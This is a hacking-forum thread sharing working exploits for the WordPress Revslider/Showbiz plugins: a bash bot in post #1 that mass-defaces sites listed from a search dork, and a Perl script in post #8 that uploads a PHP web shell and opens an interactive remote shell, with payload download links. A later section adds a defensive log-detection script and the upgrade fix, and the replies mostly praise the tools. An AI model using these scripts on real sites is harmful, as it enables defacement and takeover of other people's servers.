[Share] [BASH] Revslider WordPress Exploit
#1
This time I'll share the Revslider bot written by Index Php. I've already checked, so hopefully this isn't a double post.

[Image: Screenshot_4.png]

This bot is a bash script; many people call it a Linux shell program, and you can tell from the name alone: bash (Bourne Again Shell).
Bash can only be run on Linux and its relatives.

First, save this bash file:

Code:
#!/bin/bash
#coded = IBT
SS(){
curl --silent --max-time 10 --connect-timeout 10 -o tmp/resp.txt \
-H "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729)" \
-H "Accept-Language: en-us,en;q=0.5" \
-H "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7" \
-F "client_action=update_captions_css" \
-F "action=revslider_ajax_action" \
-F "data=x$(cat tmp/s.txt)" \
--request POST "http://${1}/wp-admin/admin-ajax.php"
}
CD(){
if [ -f tmp/cd.txt ];then
rm -f tmp/cd.txt
fi
curl --silent --max-time 10 --connect-timeout 10 "http://${1}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css" -o tmp/cd.txt
if [ ! -f tmp/cd.txt ];then
echo "--> $urlnya : not vuln"
continue
fi
cat tmp/cd.txt | grep -i "Creed" > /dev/null;cd=$?
if [ $cd -eq 0 ];then
echo "--> ${1}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css : exploit success"
echo "http://${1}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css" >> success.txt
else
echo "--> $urlnya : exploit failed"
fi
}
CV(){
if [ -f tmp/cv.txt ];then
rm -f tmp/cv.txt
fi
curl --silent --max-time 10 --connect-timeout 10 "http://${1}/wp-admin/admin-ajax.php?action=revslider_ajax_action" -o tmp/cv.txt
if [ ! -f tmp/cv.txt ];then
echo "--> $urlnya : not vuln"
continue
fi
cat tmp/cv.txt | grep "wrong ajax action:" > /dev/null;cv=$?
if [ $cv -eq 1 ];then
echo "--> $urlnya : not vuln"
continue
else
echo "--> $urlnya : found revslider"
fi
}
Exp(){
for url in `cat $list`
do
urlnya=$(echo $url | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | awk '{gsub("//","/")}1' | awk '{gsub("//","/")}1')
if [ ! -f load.txt ];then
touch load.txt
fi
cat load.txt | grep "$urlnya" > /dev/null;ccl=$?
if [ $ccl -eq 1 ];then
echo $urlnya >> load.txt
else
#already loaded once (listed in load.txt)
#to load it again, delete load.txt
continue
fi
echo "--> $urlnya : check"
CV $urlnya
SS $urlnya
CD $urlnya
done
}
Lengkap(){
if [ ! -f $list ];then
echo "[!] $list not exist"
exit
fi
if [ ! -d tmp ];then
mkdir tmp
fi
if [ ! -f tmp/s.txt ];then
cat > tmp/s.txt <<_script
<body style='color: transparent;background-color: black'><center><h1><b style='color: white'>Hacked by Creed<p style='color: transparent'>
_script
fi
Exp
}
read -p "[+] Enter list target = " list
Lengkap

Replace the nick Creed with your own name.
Save the bash script as rev.sh.

Then make the target list. Here I have 5 targets; I found them with this dork:
wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
Save your target list as target.txt.

If the bash script gives an error after you save and run it, run dos2unix on it first with this command:

dos2unix rev.sh

and tick the execute permission like this:

[Image: Screenshot_3.png]

Once it no longer errors, run the bash script again: open a terminal, type bash rev.sh, then enter target.txt.

[Image: Screenshot_8.png]

If it says success, you've succeeded. Hope this simple tutorial is useful, bro.. and hopefully I get a free email too hehe Big Grin

#2
awesome Smile
thanks for sharing bro.. BTW, censor that target.txt first so you don't get in trouble Big Grin

#3
[Image: 214cfh0.png]

Thank goodness it's not vuln.. Big Grin but with wpscan there is a vuln...
better I find it than someone else.. Smile
Read.. Read.. And Read again..!!

#4
great, bro..
I've learned something new again. Big Grin

#5
(05-14-2015, 03:10 PM)drewcode Wrote: awesome Smile
thanks for sharing bro.. BTW, censor that target.txt first so you don't get in trouble Big Grin

Yes, you're welcome bro, nice to meet you Big Grin
Oh no, I forgot to blur it...

#6
(05-14-2015, 03:13 PM)bintanGelap19 Wrote: [Image: 214cfh0.png]

Thank goodness it's not vuln.. Big Grin but with wpscan there is a vuln...
better I find it than someone else.. Smile

Is it true that wpscan finds a vuln there? As far as I know that site runs phpBB Smile

#7
(05-14-2015, 04:30 PM)Devonz Wrote: great, bro..
I've learned something new again. Big Grin

Hope this simple tutorial is useful, bro. Oh yeah, nice to meet you.

#8
@Creed: nice share bro, mine is the Perl one, from the original author:
http://www.morxploit.com/morxploits/morxrevbiz.pl

Code:
#!/usr/bin/perl
#
# Title: Slider Revolution/Showbiz Pro shell upload exploit
# Author: Simo Ben youssef
# Contact: Simo_at_Morxploit_com
# Discovered: 15 October 2014
# Coded: 15 October 2014
# Updated: 25 November 2014
# Published: 25 November 2014
# MorXploit Research
# http://www.MorXploit.com
# Vendor: ThemePunch
# Vendor url: http://themepunch.com
# Software: Revslider/Showbiz Pro
# Versions: <= 3.0.95 (Revslider) / Version: <= 1.7.1 (Showbiz Pro)
# Products url:
# http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380
# http://codecanyon.net/item/showbiz-pro-responsive-teaser-wordpress-plugin/4720988
# Vulnerable scripts:
# revslider/revslider_admin.php
# showbiz/showbiz_admin.php
#
# About the plugins:
# The #1 Slider plugin, used by millions, slider revolution is an all-purpose slide displaying solution that allows for showing almost any
# kind of content with highly customizable transitions, effects and custom animations.
# Showbiz Pro is a responsive teaser displaying solution that allows you to show WordPress Posts or any Custom Content with a set
# amount of teaser items.
#
# Description:
# Slider Revolution and Showbiz Pro fail to check authentication in revslider_admin.php/showbiz_admin.php allowing an unauthenticated
# attacker to abuse administrative features.
# Some of the features include:
# Creating/Deleting/Updating sliders
# Importing/exporting sliders
# Updating plugin
# For a full list of functions please see revslider_admin.php/showbiz_admin.php
#
# PoC on revslider:
# 1- Deleting a slider:
# root@host:/home/rootuser# curl -v --data "action=revslider_ajax_action&client_action=delete_slider&data[sliderid]=1"
# http://****.com/wp-admin/admin-ajax.php
# * Connected to ****.com (**.**.**.**) port 80 (#0)
# > POST /wp-admin/admin-ajax.php HTTP/1.1
# > User-Agent: curl/7.35.0
# > Host: ****.com
# > Accept: */*
# > Content-Length: 73
# > Content-Type: application/x-www-form-urlencoded
# >
# * upload completely sent off: 73 out of 73 bytes
# < HTTP/1.1 200 OK
# < Date: Fri, 24 Oct 2014 23:25:07 GMT
# * Server Apache/2.4.6 (Unix) OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 is not blacklisted
# < Server: Apache/2.4.6 (Unix) OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
# < X-Powered-By: PHP/5.4.18
# < X-Robots-Tag: noindex
# < X-Content-Type-Options: nosniff
# < Expires: Wed, 11 Jan 1984 05:00:00 GMT
# < Cache-Control: no-cache, must-revalidate, max-age=0
# < Pragma: no-cache
# < X-Frame-Options: SAMEORIGIN
# < Set-Cookie: PHPSESSID=a23ex1c8a573f1d1xd28c301793ba022c; path=/
# < Transfer-Encoding: chunked
# < Content-Type: text/html; charset=UTF-8
# <
# * Connection #0 to host http://****.com left intact
#
# {"success":true,"message":"The slider deleted","is_redirect":true,"redirect_url":"http:\/\/****.com\/wp-admin\/admin.php?page=revslider&view=sliders"}
#
# 2- Uploading a web shell:
# The following perl exploit will try to upload an HTTP php shell through the update_plugin function
# To use the exploit make sure you first download the revslider.zip and showbiz.zip files which contain cmd.php
# http://www.morxploit.com/morxploits/revslider.zip
# http://www.morxploit.com/morxploits/showbiz.zip
# and save them in the same directory where you have the exploit.
#
# Demo:
# perl morxrev.pl http://localhost revslider
# ===================================================
# --- Revslider/Showbiz shell upload exploit
# --- By: Simo Ben youssef <simo_at_morxploit_com>
# --- MorXploit Research www.MorXploit.com
# ===================================================
# [*] Target set to revslider
# [*] MorXploiting http://localhost
# [*] Sent payload
# [+] Payload successfully executed
# [*] Checking if shell was uploaded
# [+] Shell successfully uploaded
#
# Linux MorXploit 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:30:00 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
#
# www-data@MorXploit:~$
#
# Download:
# Exploit:
# http://www.morxploit.com/morxploits/morxrevbiz.pl
# Exploit update zip files:
# http://www.morxploit.com/morxploits/revslider.zip
# http://www.morxploit.com/morxploits/showbiz.zip
#
# Requires LWP::UserAgent
# apt-get install libwww-perl
# yum install libwww-perl
# perl -MCPAN -e 'install Bundle::LWP'
# For SSL support:
# apt-get install liblwp-protocol-https-perl
# yum install perl-Crypt-SSLeay
#
# Mitigation:
# Besides the LFI vulnerability that was published a couple of months ago, this is another vulnerability that revslider developers have
# decided to patch without releasing a full security advisory, leaving thousands of revslider users who didn't update their plugin to the
# latest version (=> 3.0.96) vulnerable to this nasty flaw, revsliders developers will argue the fact that their slider comes with an
# auto-update feature, but the problem is that this plugin is bundled with a lot of themes, which means that those themes users may not get
# plugin updates or will have to pay to get the update. In other words revslider developers believe that every user should have the
# auto-update feature on, otherwise ... you are screwed.
# Obviously this is way more critical than the LFI vulnerability because it allows shell access giving attackers access to the target system
# as well as the ability to dump the entire wordpress database locally.
# That being said, upgrade immediately to the latest version or disable/switch to another plugin.
# As for Showbiz Pro, sadly the vulnerability has never been patched as we successfully exploited it in the latest version (1.7.1).
#
# Author disclaimer:
# The information contained in this entire document is for educational, demonstration and testing purposes only.
# Author cannot be held responsible for any malicious use or damage. Use at your own risk.
#
# Got comments or questions?
# Simo_at_MorXploit_dot_com
#
# Did you like this exploit?
# Feel free to buy me a beer =)
# My btc address: 1Ko12CUAFoWn8syrvg4aQokFedNiwD6d7u
# Cheers!

use LWP::UserAgent;
use MIME::Base64;
use strict;

sub banner {
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
print "===================================================\n";
print "--- Revslider/Showbiz shell upload exploit\n";
print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n";
print "--- MorXploit Research www.MorXploit.com\n";
print "===================================================\n";
}

if (!defined ($ARGV[0] && $ARGV[1])) {
banner();
print "perl $0 <target> <plugin>\n";
print "perl $0 http://localhost revslider\n";
print "perl $0 http://localhost showbiz\n";
exit;
}

my $zip1 = "revslider.zip";
my $zip2 = "showbiz.zip";

unless (-e ($zip1 && $zip2))
{
banner();
print "[-] $zip1 or $zip2 not found! RTFM\n";
exit;
}

my $host = $ARGV[0];
my $plugin = $ARGV[1];
my $action;
my $update_file;

if ($plugin eq "revslider") {
$action = "revslider_ajax_action";
$update_file = "$zip1";
}
elsif ($plugin eq "showbiz") {
$action = "showbiz_ajax_action";
$update_file = "$zip2";
}
else {
banner();
print "[-] Wrong plugin name\n";
print "perl $0 <target> <plugin>\n";
print "perl $0 http://localhost revslider\n";
print "perl $0 http://localhost showbiz\n";
exit;
}
my $target = "wp-admin/admin-ajax.php";
my $shell = "wp-content/plugins/$plugin/temp/update_extract/$plugin/cmd.php";

sub randomagent {
my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
);
my $random = $array[rand @array];
return($random);
}
my $useragent = randomagent();

my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
$ua->timeout(10);
$ua->agent($useragent);
my $status = $ua->get("$host/$target");
unless ($status->is_success) {
banner();
print "[-] Xploit failed: " . $status->status_line . "\n";
exit;
}

banner();
print "[*] Target set to $plugin\n";
print "[*] MorXploiting $host\n";

my $exploit = $ua->post("$host/$target", Cookie => "", Content_Type => "form-data", Content => [action => "$action", client_action => "update_plugin", update_file => ["$update_file"]]);

print "[*] Sent payload\n";

if ($exploit->decoded_content =~ /Wrong update extracted folder/) {
print "[+] Payload successfully executed\n";
}

elsif ($exploit->decoded_content =~ /Wrong request/) {
print "[-] Payload failed: Not vulnerable\n";
exit;
}

elsif ($exploit->decoded_content =~ m/0$/) {
print "[-] Payload failed: Plugin unavailable\n";
exit;
}

else {
$exploit->decoded_content =~ /<\/b>(.*?)<br>/;
print "[-] Payload failed:$1\n";
print "[-] " . $exploit->decoded_content unless (defined $1);
print "\n";
exit;
}

print "[*] Checking if shell was uploaded\n";

sub rndstr{ join'', @_[ map{ rand @_ } 1 .. shift ] }
my $rndstr = rndstr(8, 1..9, 'a'..'z');
my $cmd1 = encode_base64("echo $rndstr");
my $status = $ua->get("$host/$shell?cmd=$cmd1");

if ($status->decoded_content =~ /system\(\) has been disabled/) {
print "[-] Xploit failed: system() has been disabled\n";
exit;
}

elsif ($status->decoded_content !~ /$rndstr/) {
print "[-] Xploit failed: " . $status->status_line . "\n";
exit;
}

elsif ($status->decoded_content =~ /$rndstr/) {
print "[+] Shell successfully uploaded\n";
}
my $cmd2 = encode_base64("whoami");
my $whoami = $ua->get("$host/$shell?cmd=$cmd2");
my $cmd3 = encode_base64("uname -n");
my $uname = $ua->get("$host/$shell?cmd=$cmd3");
my $cmd4 = encode_base64("id");
my $id = $ua->get("$host/$shell?cmd=$cmd4");
my $cmd5 = encode_base64("uname -a");
my $unamea = $ua->get("$host/$shell?cmd=$cmd5");
print $unamea->decoded_content;
print $id->decoded_content;
my $wa = $whoami->decoded_content;
my $un = $uname->decoded_content;
chomp($wa);
chomp($un);

while () {
print "\n$wa\@$un:~\$ ";
chomp(my $cmd=<STDIN>);
if ($cmd eq "exit")
{
print "Aurevoir!\n";
exit;
}
my $ucmd = encode_base64("$cmd");
my $output = $ua->get("$host/$shell?cmd=$ucmd");
print $output->decoded_content;
}

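From the defender's side, the two scripts in this thread leave recognisable traces in a web server log: the bash bot from post #1 first fetches admin-ajax.php with action=revslider_ajax_action, then with client_action=get_captions_css, and the Perl exploit from post #8 later requests the cmd.php it expects under wp-content/plugins/<plugin>/temp/update_extract/. The Python below is an added example, not code from this thread or from either script's author: it runs a few constructed access-log lines (combined log format, documentation IP addresses) through those rules, aggregates alerts per source IP, and separately checks whether the captions CSS a site serves through get_captions_css has been replaced with HTML, which is what the bash bot writes. The log lines, IP addresses and alert tag names are all constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined" access log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# admin-ajax actions the two plugins exposed without an authentication check
AJAX_ACTIONS = {"revslider_ajax_action", "showbiz_ajax_action"}
# client_action values that appear in the thread: the bash bot's probe/write
# pair and the Perl exploit's slider deletion and plugin "update" (zip upload)
ADMIN_CLIENT_ACTIONS = {"get_captions_css", "update_captions_css",
                        "update_plugin", "delete_slider"}
# directory the Perl exploit fetches its extracted cmd.php from
EXTRACT_DIR_RE = re.compile(r"/wp-content/plugins/(revslider|showbiz)/temp/update_extract/")
# the bash bot stores an HTML fragment, not CSS, through update_captions_css
HTML_TAG_RE = re.compile(r"<\s*/?\s*(body|script|iframe|h1|center|p|b)\b", re.I)

# Constructed sample log lines for the example (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [14/May/2015:15:02:11 +0700] "GET /wp-admin/admin-ajax.php?action=revslider_ajax_action HTTP/1.1" 200 22 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1) Firefox/3.0.16"
203.0.113.7 - - [14/May/2015:15:02:12 +0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 35 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1) Firefox/3.0.16"
203.0.113.7 - - [14/May/2015:15:02:13 +0700] "GET /wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css HTTP/1.1" 200 143 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1) Firefox/3.0.16"
198.51.100.23 - - [14/May/2015:15:05:40 +0700] "GET /wp-content/plugins/revslider/temp/update_extract/revslider/cmd.php?cmd=aWQ= HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux x86_64) Chrome/26.0.1410.63"
192.0.2.9 - - [14/May/2015:15:06:01 +0700] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 12 "https://example.test/wp-admin/" "Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome/36.0.1985.67"
192.0.2.9 - - [14/May/2015:15:06:05 +0700] "GET /wp-content/plugins/revslider/rs-plugin/css/settings.css HTTP/1.1" 200 9021 "https://example.test/" "Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome/36.0.1985.67"
"""


def classify(line):
    """Return the list of alert tags for one access-log line (empty = nothing suspicious)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsed"]
    parts = urlsplit(m.group("target"))
    path, query = parts.path, parse_qs(parts.query)
    alerts = []
    if path.endswith("/wp-admin/admin-ajax.php"):
        actions = set(query.get("action", []))
        if actions & AJAX_ACTIONS:
            hit = set(query.get("client_action", [])) & ADMIN_CLIENT_ACTIONS
            if hit:
                alerts.append("revslider-admin-action:" + ",".join(sorted(hit)))
            else:
                # the bash bot's first request: action only, no client_action
                alerts.append("revslider-ajax-probe")
    if EXTRACT_DIR_RE.search(path):
        # anything served from the update-extract directory is suspicious;
        # a cmd= parameter on top of that matches the Perl exploit's shell calls
        tag = "update_extract-access"
        if "cmd" in query:
            tag += ":cmd-param"
        alerts.append(tag)
    return alerts


def scan(lines):
    """Aggregate alert tags per source IP over an iterable of log lines."""
    hits = {}
    for line in lines:
        tags = classify(line)
        if tags and tags != ["unparsed"]:
            ip = LOG_RE.match(line).group("ip")
            hits.setdefault(ip, []).extend(tags)
    return hits


def captions_css_tampered(css_text):
    """True if the captions CSS returned by get_captions_css contains HTML markup."""
    return bool(HTML_TAG_RE.search(css_text))


if __name__ == "__main__":
    for ip, tags in scan(SAMPLE_LOG.splitlines()).items():
        print(ip, tags)
    # the fragment the bash bot writes, reduced to its opening tags (constructed)
    print(captions_css_tampered("<body style='color: transparent'><center><h1>Hacked by"))
```

A plain access log does not record POST bodies, so the update_captions_css and update_plugin requests show up only as POSTs to admin-ajax.php; what the rules above catch is the GET probe that precedes them and the later fetch of the extracted cmd.php, which is why the captions-CSS content check is included as a second signal. The actual fix is the one the Perl header states: update past 3.0.96 or remove the plugin.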

#9
(05-15-2015, 09:19 AM)abdilahrf Wrote: @Creed: nice share bro, mine is the Perl one, from the original author:
http://www.morxploit.com/morxploits/morxrevbiz.pl

Wow, thanks a lot bro for adding that.. nice to meet you Smile
I'm Not Jomblo | I'm Not Single | I'm Just Linuxer


#10
Wow, thanks for the share bro.

If I may ask, how does this exploit actually work? Oh yeah, that one writes CSS; what if I want to write a PHP file instead, bro?